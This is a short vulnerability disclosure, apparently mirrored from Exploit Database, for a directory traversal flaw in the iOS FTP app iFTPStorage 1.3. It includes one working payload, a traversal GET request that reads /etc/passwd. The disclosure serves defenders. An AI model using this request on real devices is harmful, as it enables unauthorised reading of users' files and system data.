iOS iFTPStorage 1.3 – Directory Traversal

• Exploit Database
• 9 阅读

• 作者： XEL
  日期： 2010-12-03
• 类别：

  • remote
  平台：

  • ios
• 来源：https://www.exploit-db.com/exploits/15664/

• #############################################
  ###					###
  ##		 _x3l		 ##
  #	http://gahor-krisztian.hu/xel	#
  ##	xel@gahor-krisztian.hu	 ##
  ###					###
  #############################################
  
  
  # Exploit: iFTPStorage for iPhone / iPod touch <= 1.3 - Directory Traversal
  # Date: 02/12/2010
  # Author: _x3l
  # Software Link: http://itunes.apple.com/us/app/iftpstorage/id333357690?mt=8
  # Version: 1.3
  # Tested on: iPhone 3GS with 4.2.1 firmware
  
  There is directory traversal vulnerability in the iFTPStorage.
  You can download all file from the iPhone when you connected to the ftp server.
  	For example: GET ../../../../../../etc/passwd